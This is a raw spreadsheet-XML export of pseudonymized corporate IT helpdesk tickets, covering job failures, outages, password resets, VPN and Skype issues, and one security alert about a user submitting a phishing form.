    <s v="circuit outage:usa:secondary vpn circuit is down since at 5:51 am et on 09/10.site have backup ."/>
    <s v="what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______5:51 am et on 09/10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yes_____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___yes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job Job_1427 failed in job_scheduler at: 09/10/2016 04:07:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1427 failed in job_scheduler at: 09/10/2016 04:07:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1348 failed in job_scheduler at: 09/10/2016 03:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1348 failed in job_scheduler at: 09/10/2016 03:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to print production orders : error : production_order_interface_vendor-connc-bng"/>
    <s v="unable to print production orders since last 1 hour._x000d__x000a_user was doing half day and mentioned that he will contact again on monday for this issue._x000d__x000a_not sure if rest of users in india plant facing same issue._x000d__x000a_collated information for issue with screenshot and assigning to concern team._x000d__x000a__x000d__x000a__x000d__x000a_connection to system production_order_interface_app-bng with destination production_order_interface_vendor-connc-bng is not okay."/>
    <s v="yjkalmbr jsdyzivq"/>
    <x v="13"/>
  </r>
  <r>
    <s v="account locked out "/>
    <s v="account locked out "/>
    <s v="chobktqj qdamxfuc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account lcoked out."/>
    <s v="389_x000d__x000a_summary:password change is locked. need to change all password"/>
    <s v="jacgtfxo vlbeuxif"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_577 failed in job_scheduler at: 09/10/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_577 failed in job_scheduler at: 09/10/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_549 failed in job_scheduler at: 09/09/2016 23:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_549 failed in job_scheduler at: 09/09/2016 23:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="clientless vpn is not working"/>
    <s v="_x000a__x000a_received from: qklrdoba.qxivmbts@gmail.com_x000a__x000a_hello,_x000a_                greetings of the day._x000a__x000a_please note that the clientless vpn is not working in my system, below details are for your kind information only:_x000a__x000a_user id       : sarhytukas_x000a_system id : awyl9326112_x000a__x000a_please find below the snaps i am receiving while trying to use vpn_x000a__x000a_[cid:image002.jpg@01d20b3d.0d85d170]_x000a__x000a_[cid:image006.jpg@01d20b3d.0d85d170]_x000a__x000a_please do the needful._x000a__x000a__x000a_"/>
    <s v="qklrdoba qxivmbts"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: apac , site hard down since 7:29 pm et on 9/9/2016. no backup."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________7:29 pm et on 9/9/2016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no_____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____na____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na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job SID_46filesys failed in job_scheduler at: 09/09/2016 22:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_46filesys failed in job_scheduler at: 09/09/2016 22:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 09/09/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_62_erp_dly_dp failed in job_scheduler at: 09/09/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1348b failed in job_scheduler at: 09/09/2016 18:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1348b failed in job_scheduler at: 09/09/2016 18:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="skype login issue."/>
    <s v="skype login issue._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login to the skype._x000d__x000a_-issue resolved._x000d__x000a__x000d__x000a_"/>
    <s v="ltsqkane ycgwexdf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no audio while on skype meeting "/>
    <s v="no audio while on skype meeting"/>
    <s v="epwyvjsz najukwho"/>
    <x v="0"/>
  </r>
  <r>
    <s v="confidential - project x update - outlook issue with displaying an image in the meeting invite (ms project image, png im"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kehtxprg.uekapfzt@gmail.com_x000d__x000a__x000d__x000a_hello company it help,_x000d__x000a__x000d__x000a_for some reason the image in the invitations does not show up, as you can see below. the only think is this [!oc([1033])!]_x000d__x000a__x000d__x000a_is this an issue on my end how outlook is setup or something from the sender side?_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="kehtxprg uekapfzt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_577 failed in job_scheduler at: 09/09/2016 16:50:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_577 failed in job_scheduler at: 09/09/2016 16:50:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="the odbc connection to glovia-old no longer works to access glovia data"/>
    <s v=" access can no longer connect to dsn=glovia-old.  we need this connection to obtain archived data.  please assign to keyhtyvin toriaytun."/>
    <s v="mfvkxghn mzjasxqd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="emails not updating in outlook"/>
    <s v="emails not updating in outlook"/>
    <s v="gvmqopuz vbpsxdhf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_553 failed in job_scheduler at: 09/09/2016 15:18:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_553 failed in job_scheduler at: 09/09/2016 15:18:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="update office to 64 bit"/>
    <s v="name:kvrmnuix yicpojmf_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:kvrmnuix.yicpojmf@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:update office to 64-bit"/>
    <s v="kvrmnuix yicpojmf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype error"/>
    <s v="skype error"/>
    <s v="zfdkqgmt zvqxcodk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to submit a discount form"/>
    <s v="unable to submit a discount form"/>
    <s v="trmhfxoz bxofhryg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // gso"/>
    <s v="blank call // gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please install project 2013 back on the clients pc"/>
    <s v="please install project 2013 back on the clients pc"/>
    <s v="asxmeruj drqufvgj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="in engineering tool, when i try to create a new task, some of the options are not being displayed.. "/>
    <s v="in engineering tool, when i try to create a new task, some of the options are not being displayed.. _x000d__x000a__x000d__x000a_please refer the attachment "/>
    <s v="pyamiwvx terscahn"/>
    <x v="25"/>
  </r>
  <r>
    <s v="job Job_3194 failed in job_scheduler at: 09/09/2016 14:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3194 failed in job_scheduler at: 09/09/2016 14:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="supply_chian_mgmt_tool password reset."/>
    <s v="supply_chian_mgmt_tool password reset."/>
    <s v="dslamtcb ezbmonjr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lauacyltoe hxgaycze java to be installed"/>
    <s v="lauacyltoe hxgaycze java to be installed"/>
    <s v="qscdktvl rihendxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="chg0034110"/>
    <s v="_x000a__x000a_received from: afkstcev.utbnkyop@gmail.com_x000a__x000a_hello everyone_x000a__x000a__x000a__x000a_users will receive a message to logon to _x000a__x000a__x000a__x000a_afkstcev utbnkyop_x000a_senior analyst, bokrgadu euobrlcn_x000a_afkstcev.utbnkyop@gmail.com&lt;mailto:afkstcev.utbnkyop@gmail.com&gt;_x000a__x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update inplant_858871"/>
    <s v="ticket update inplant_858871"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user needs access to the engineering_tool."/>
    <s v="user needs access to the engineering_tool."/>
    <s v="sjhrytwn yakzbslm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to add contacts to markhtyeting list to receive catalogs in crm "/>
    <s v="unable to add contacts to markhtyeting list to receive catalogs in crm_x000a__x000a_user id - kindftyed_x000a_contact no - _x000a_"/>
    <s v="vktxjamz whbdetvp"/>
    <x v="22"/>
  </r>
  <r>
    <s v=" incident #in33541962 - phishing form submit - outbound beshryulisted ip - dane-williuthyr"/>
    <s v="source ip: 10.38.93.30_x000a_source hostname: dane-williuthyr_x000a_user  name: dghuane whryuiams (wijuiidl)_x000a_location : usa pa eh_x000a_sep , sms status : n/a_x000a_field sales user ( yes / no) : no_x000a_dsw event log: see below_x000a__x000a_**_x000a__x000a_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_x000a__x000a_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full escalation for related events (high priority ticket and a phone call)._x000a_2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal)._x000a__x000a_sincerely,_x000a_ ctoc_x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a__x000a_event id: 304247119_x000a_event summary: [ipbl]: phishing form submit - outbound beshryulisted ip_x000a_occurrence count: 1_x000a_event count: 1_x000a__x000a_host and connection information_x000a_source ip: 10.38.93.30_x000a_source hostname: dane-williuthyr_x000a_source mac address: 28:5a:eb:51:db:f0_x000a_destination ip: 107.180.41.85_x000a_destination hostname: ip-107-180-41-85.ip.secureserver.net._x000a_destination ip geolocation: schtrtgoyhtsdale, usa_x000a_connection directionality: outgoing_x000a__x000a_device information_x000a_device ip: 18.79.63.203_x000a_device name: company-internal-asa.company.com-1_x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 701525_x000a_inspector event id: 031724385_x000a_agent id: 103611_x000a__x000a_event detail:_x000a_aug 8 13:11:36 18.79.63.203 %asa-6-302013: built outbound tcp connection 2173940377 for outside:107.180.41.85/80 (107.180.41.85/80) to inside:10.38.93.30/58345 (12.161.199.50/14084)_x000a__x000a_[correlation_data]_x000a_aug 8 06:46:44 27.38.93.278 dhcpd[2261]: dhcpack on 10.38.93.30 to 28:5a:eb:51:db:f0 (dane-williuthyr) via eth1 relay 10.38.92.1 lease-duration 604800 (renew)_x000a_take action_x000a__x000a_ticket action:_x000a_"/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_1427 failed in job_scheduler at: 09/09/2016 13:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1427 failed in job_scheduler at: 09/09/2016 13:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="reparo adobe pdf"/>
    <s v="os recibo gerados em pdf estÃ£o saindo com caracteres."/>
    <s v="frjpkuwq rtznexbq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="design_tool service: file naming convention has changed"/>
    <s v="the geengineering_tooloductdata web service calls the design_tool service to obtain cad models for engineering_tool._x000d__x000a_i believe this link points to the design_tool uacyltoe hxgaycze service: _x000d__x000a__x000d__x000a_looks like the naming convention has changed in the last few days and files returned by this service are being named with just the materials_management number._x000d__x000a_(e.g. mm 7304975 in SID_34. see the attached fw  engineering_tool drills.msg for more details)_x000d__x000a__x000d__x000a_the change is causing issues with models not being returned to  engineering_tool._x000d__x000a_engineering_tool will be demoed at imts starting on monday the 12th. _x000d__x000a_need an urgent fix to revert any changes that might have been made to the file naming convention for files from the design_tool service._x000d__x000a__x000d__x000a_below are the original rules uli had implemented for file names for cad files returned by this service._x000d__x000a_here are the implemented naming rules:_x000d__x000a__x000d__x000a_â€¢ if there is a cad_catalog_iso it's taken, _x000d__x000a_o else if there is a cad_catalog_ansi it's taken,_x000d__x000a_ï‚§ else rqfhiong zkwfqagb is taken_x000d__x000a_â€¢ an underscore plus cad_graph_type is added _x000d__x000a_â€¢ finally the original file extension is added_x000d__x000a__x000d__x000a_"/>
    <s v="fyuqhlcx fjiuhxae"/>
    <x v="25"/>
  </r>
  <r>
    <s v="ticket update on inplant_858893"/>
    <s v="ticket update on inplant_858893"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dell 7350 tablet cracked after it was accidentally dropped."/>
    <s v="dell 7350 tablet cracked after it was accidentally dropped"/>
    <s v="qcxivzag vyucbagx"/>
    <x v="2"/>
  </r>
  <r>
    <s v="approval workflow problems"/>
    <s v="_x000d__x000a_i am approfghaching you, as we have problems with our approval workflow for credit memo requests respectively rmas._x000d__x000a_i opened several tickets regarding this topic, which unfortunately did not lead to a final solution._x000d__x000a_maybe it is a (erp-) language problem for my part._x000d__x000a_anyway, i  hope, that you can help to get this fixed._x000d__x000a__x000d__x000a_the approval levels for our organization are as follows (regardless who is the sales person in customer account)_x000d__x000a_level 1 (1.000â‚¬-4.999â‚¬): jwqyxbzs adpvilqu (afcbrhqw vudghzcb as subsitute, if possible)_x000d__x000a_level 2 (5.000â‚¬-9.999â‚¬): jwqyxbzs adpvilqu (afcbrhqw vudghzcb as substitute if possible)_x000d__x000a_level 3 (10.000â‚¬-24.999â‚¬): qsoxltny dzjespml (tjnwdauo jkdwbhgs as substitute if possible)_x000d__x000a_level 4 (25.000â‚¬ plus): michghytuael rÃ¼nz (tjnwdauo jkdwbhgs as substitute if possible)_x000d__x000a__x000d__x000a_it often happens, that these workflows are routed to the wrong person._x000d__x000a_lauacyltoe hxgaycze example: rma 7611183856 was routed to me at level 1 and approved, but then to jmkcewds qkoipbzn at level 2, wo has nothing to do with it._x000d__x000a__x000d__x000a_it takes a lot of time, to gather the wrong routed workflows and to forward them to the responsible person._x000d__x000a__x000d__x000a_i appreciate your help._x000d__x000a_"/>
    <s v="jwqyxbzs adpvilqu"/>
    <x v="12"/>
  </r>
  <r>
    <s v="sound not working"/>
    <s v="sound not working"/>
    <s v="obanjrhg rnafleys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp will not open"/>
    <s v="_x000a__x000a_received from: nkthumgf.mwgdenbs@gmail.com_x000a__x000a_hi,_x000a_is erp down for vpn users?  i keep getting this error every time i try to log on to SID_34.  i was in erp @ 2 hrs ago with no troubles.  please help._x000a__x000a_[cid:image001.png@01d20a93.c5047641]_x000a__x000a_nkthumgf mwgdenbs_x000a_nkthumgf.mwgdenbs@gmail.com&lt;mailto:nkthumgf.mwgdenbs@gmail.com&gt;_x000a_ph: _x000a__x000a__x000a__x000a_"/>
    <s v="nkthumgf mwgdenbs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update on inplant_857663"/>
    <s v="update on inplant_857663"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i'm trying to print to our network printer  savin c2525"/>
    <s v="i'm trying to print to our network printer  savin c2525"/>
    <s v="dzrbwhco frmhpwda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i was kicked out of vpn but i am reconnected now."/>
    <s v="vpn stopped working but i was able to reconnected after a few minutes."/>
    <s v="lxvpesjo azmqlfoi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1348a failed in job_scheduler at: 09/09/2016 11:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1348a failed in job_scheduler at: 09/09/2016 11:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="error when logging in to hana"/>
    <s v="please see attached error that i receive when trying to log in to hana"/>
    <s v="eqrknylx nqpsjhwc"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to login to SID_1"/>
    <s v="unable to login to SID_1"/>
    <s v="ksmjylwg syihalqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i am locked out of global view prtgghj4k. i need my password reset. this is very urgent as i have payroll reports i must pull "/>
    <s v="i am locked out of global view prtgghj4k. i need my password reset. this is very urgent as i have payroll reports i must pull from there this morning."/>
    <s v="zfebmujk mtdzqjue"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset for tinmuym alrthyu"/>
    <s v="windows password reset for tinmuym alrthyu"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ltcl8513156 - hgmx5q1 - e6420"/>
    <s v="rarty has this old laptop that he needs to login to but cannot when it is connected to the network. error: security database on the server does not have a computer account for this workstation trust relationship ..._x000a_he can once its not connected with an old password. he needs to play some cds and his new laptop does not have a cd drive. _x000a_please see why this laptop cannot be found in ad. _x000a_ph: 5446"/>
    <s v="csmhykge mpxbjudw"/>
    <x v="2"/>
  </r>
  <r>
    <s v="skype audio is not working "/>
    <s v="skype audio is not working "/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn vpn is not working, need urgent help"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bmudkpie.qolrvbip@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01d20aae.bff38300]_x000d__x000a__x000d__x000a_best "/>
    <s v="bmudkpie qolrvbip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_engineering_tools - unable to run reports from etime"/>
    <s v="unable to run reports from etime"/>
    <s v="goaxzsql qpjnbgsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch business_client - .net framdntyework needs to be installed"/>
    <s v="initiated the download of .net 4.5.2"/>
    <s v="pxcvrjfq wkdaevfn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="account unlock - erp SID_34"/>
    <s v="unlocked the account. todd was able to get in successfully"/>
    <s v="lwbchnga axpqctfr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch skype"/>
    <s v="unable to launch skype"/>
    <s v="gcaktshf kpgfrotd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="gcaktshf kpgfrotd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log into skype"/>
    <s v="_x000d__x000a__x000d__x000a_received from: muywpnof.prtikusy@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_                i am getting an error trying to log into skype.  my address is correct, log in id is correct, and password is correct and have tried a few times and get the same error.  what do i need to do be able to log into skype._x000d__x000a_"/>
    <s v="muywpnof prtikusy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account number incorrect : urgent ,"/>
    <s v="trurthyuft,_x000d__x000a__x000d__x000a_per our converstion and shatryung of my screen on teamviewer this morning below is a screen shot of the account issue._x000d__x000a__x000d__x000a_if you look at opportstorage_product number mdoSID_3487210 it has the correct account number for the customer 81211699.  that opp was created on 7/13/16 and there was no problem selecting that correct account number._x000d__x000a__x000d__x000a_all of the other opportunities were created more recently (after 8/15/16) and i was only able to choose account number 81991714, which is not the correct account number._x000d__x000a__x000d__x000a_i need to close these out today as won._x000d__x000a_"/>
    <s v="jgxclrzp jzeantui"/>
    <x v="39"/>
  </r>
  <r>
    <s v="erp engineering tool locked out "/>
    <s v="erp engineering tool locked out "/>
    <s v="ptjahcfz kwaqblxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bahdqrcs xvgzdtqj's onbankrding experience"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xzupryaf.vlbikhsm@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_bahdqrcs xvgzdtqj was an intern that we hired on full-time effective aug. 16th. we followed the process of having her old manager transfer her to her new manager in oneteam and then her new manager entered her new job and compensation information like he's been instructed to. however, i have to be honest, her onbankrding experience has been a disaster so far. she says that every time she calls hrss to help her out, they are not very helpful or resolve her issues. hrss will tell her it's an &quot;it problem&quot; and it will tell her that it's an &quot;hr problem.&quot; here are some of the issues that she's still having:_x000d__x000a__x000d__x000a__x000d__x000a_1.      no access to benefit information on collaboration_tool â€“ when she follows the directions that she was given, she gets an error message that says &quot;needs approval, request has been submitted.&quot;_x000d__x000a__x000d__x000a_2.      no ethics access_x000d__x000a__x000d__x000a_3.      no expense report access â€“ she was able to enter her expense report, however when she went to submit it she got an error message and now when she tries to log-in, she gets an error message. it said that this is an it problem._x000d__x000a__x000d__x000a_4.      no access to the vpn â€“ again, it said that hr needs to update the SID_34? i'm not really sure what that is._x000d__x000a__x000d__x000a_5.      incorrect paychecks â€“ she did not receive a paycheck on 8/30. i told her that depending when her information was processed, payroll might not have caught the fact that she's salary now and then it should all be corrected on her 9/15 paycheck. sharee emailed her yesterday and made it sound like everything was going to be corrected on her 9/15 paycheck, but then sent a follow-up email saying that because u2 already ran, she was not going to be able to backdate and the effective date for this change was going to have to be 9/1. she wants liuytre to provide her hours worked from 8/18 â€“ 8/31. this is not going to work because liuytre stopped tracking her hours since she is now a salaried employee. she was also at a company conference the week of 8/22 and &quot;technically&quot; worked way more than 40 hours that week because she was part of meetings, dinners and after hours' team building activities._x000d__x000a__x000d__x000a_can someone from it and shared services be her &quot;designated&quot; contact and work with her through these issues until everything is figured out? if something is an it issue, can hrss follow-up with it so she's not being passed back and forth? she is beyond frustrated and only has until next friday to figure out her benefits before her eligibility timeframdntye is up._x000d__x000a__x000d__x000a_"/>
    <s v="xzupryaf vlbikhsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset erp SID_34"/>
    <s v="password reset erp SID_34"/>
    <s v="tcekvfrb colkzbrm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="interface: fc3/34 Â· HostName_1147 on sandplant_162 is down since 7:38 am on 09/09 et"/>
    <s v="interface: fc3/34 Â· HostName_1147 on sandplant_162 is down since 7:38 am on 09/09 et"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="tcekvfrb colkzbrm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn queries "/>
    <s v="vpn queries "/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn"/>
    <s v="_x000a__x000a_received from: marhty.financial@company.com_x000a__x000a_hello:_x000a__x000a_i get the following error when i try to start vpn.  also, if i try to do the install it says i need admin rights._x000a__x000a_[cid:image001.png@01d20a6f.7ac627e0]_x000a__x000a_best "/>
    <s v="oujvmgeq spobcflw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please take snapshot of vms manually under HostName_589 "/>
    <s v="please take snapshot of vms manually under HostName_589 "/>
    <s v="tkbuhcnq kdheauqo"/>
    <x v="11"/>
  </r>
  <r>
    <s v="skype content not showing up in meeting "/>
    <s v="skype content not showing up in meeting "/>
    <s v="sdgqujpr dtilnycz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error: trust relationship between this workstation and the primary domain failed"/>
    <s v="email:oewshlmd.azjfshry@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary: when i am away from my computer for a length of time, or sometimes at start up i am getting the following error message &quot;the trust relationship between this workstation and the primary domain failed.&quot; it is a pain to keep having to totally reboot my computer when i am away from my desk for a time."/>
    <s v="oewshlmd azjfshry"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype - meetinmg button"/>
    <s v="_x000a__x000a_received from: blktuiae.jzakfmhw@gmail.com_x000a__x000a_dear it_x000a__x000a_i lost my skpe-button_x000a__x000a__x000a_view of a colleagues_x000a__x000a_[cid:image001.png@01d20a9c.2d7e8d10][cid:image002.png@01d20a9c.2d7e8d10]_x000a__x000a__x000a_my view_x000a__x000a_[cid:image003.png@01d20a9c.2d7e8d10]_x000a__x000a__x000a_gÃ¼nter webfnhtyer_x000a_manager  sourcing_x000a_blktuiae.jzakfmhw@gmail.com&lt;mailto:blktuiae.jzakfmhw@gmail.com&gt;_x000a_company shared services gmbh_x000a_geschÃ¤ftsfÃ¼hrer:  phvkowml azbtkqwx, naruedlk mpvhakdq_x000a_"/>
    <s v="blktuiae jzakfmhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not loading."/>
    <s v="outlook not loading."/>
    <s v="vpksyfco chosuygq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="finance_app time out error."/>
    <s v="finance_app time out error."/>
    <s v="ltnivuhw zbudwnfr"/>
    <x v="54"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="noxazrmy zrudycla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account extension for fqiurzas eidtfbqk - vvlfbhtyeisd"/>
    <s v="account extension for fqiurzas eidtfbqk - vvlfbhtyeisd_x000a_extend the account for another six months."/>
    <s v="kmbfhyxi cuwgmiop"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job bkwin_ms_cluster_inc failed in job_scheduler at: 09/09/2016 06:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_ms_cluster_inc failed in job_scheduler at: 09/09/2016 06:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="audio stop working after company update"/>
    <s v="audio device stoped working after company update , show the message &quot;no audio output device is installed&quot;, _x000d__x000a_more coworkers have had this trouble. _x000d__x000a_"/>
    <s v="gsotqxfi lidunfjg"/>
    <x v="62"/>
  </r>
  <r>
    <s v="unable to login to vcenter HostName_589 through vsphere client"/>
    <s v="unable to login to vcenter HostName_589 through vsphere client. kindly check the issue."/>
    <s v="tkbuhcnq kdheauqo"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to create delivery - shipments iak"/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number? _x000d__x000a__x000d__x000a_what material or item number? 4752761_x000d__x000a__x000d__x000a_what warehouse location? apac_x000d__x000a__x000d__x000a_issue description / error message? please check attached"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="5"/>
  </r>
  <r>
    <s v="uyjlodhq ymedkatw (lghuiezj3) has mapped the units m (departments), n (public) and s (teams) to the wrong server"/>
    <s v="uyjlodhq ymedkatw (lghuiezj3) has mapped the units m (departments), n (public) and s (teams) to the wrong server. she would have these units on HostName_622_x000d__x000a_pc name: ekxw8111221_x000d__x000a__x000d__x000a_"/>
    <s v="bxeagsmt zrwdgsco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usb ports not detecting devices"/>
    <s v="usb ports not detecting devices"/>
    <s v="hotwlygp afukzhnm"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ewel8323721 - konto einlegen."/>
    <s v="ewel8323721 - konto einlegen _x000d__x000a__x000d__x000a_assigning it yevirgnl ylhogjct per ughzilfm cfibdamq."/>
    <s v="ughzilfm cfibdamq"/>
    <x v="32"/>
  </r>
  <r>
    <s v="travel expense manager (erp transaction pr05) not working"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bmudkpie.qolrvbip@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_travel expense manager (erp transaction pr05) not working anylonger ?_x000d__x000a__x000d__x000a_can't start it, s. below._x000d__x000a__x000d__x000a_[cid:image001.png@01d20a8a.c63eba50]_x000d__x000a__x000d__x000a_best "/>
    <s v="bmudkpie qolrvbip"/>
    <x v="9"/>
  </r>
  <r>
    <s v="query from ; avmeocnk.mvycfwka@gmail.com"/>
    <s v="query from ; avmeocnk.mvycfwka@gmail.com"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" e-mail has been sent to the company quarantine database"/>
    <s v=" e-mail has been sent to the company quarantine database"/>
    <s v="banwdfcu uhlyqwrt"/>
    <x v="26"/>
  </r>
  <r>
    <s v="kabel vga defekt\ zedlet "/>
    <s v="kabel vga defekt\ zedlet "/>
    <s v="jionmpsf wnkpzcmv"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install kis \ewew8323506 \guvgytniak"/>
    <s v="install kis \ewew8323506 \guvgytniak"/>
    <s v="zlqfptjx xnklbfua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install kis \ewew8323504 \zlqfptjx xnklbfua"/>
    <s v="install kis \ewew8323504 \zlqfptjx xnklbfua"/>
    <s v="zlqfptjx xnklbfua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install zebra \we_wu102 \pfjwinbg ljtzbdqg"/>
    <s v="install zebra \we_wu102 \pfjwinbg ljtzbdqg"/>
    <s v="pfjwinbg ljtzbdqg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install company barcode fÃ¼r ewew8323504 \vzqomdgt jwoqbuml"/>
    <s v="install company barcode fÃ¼r ewew8323504 \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
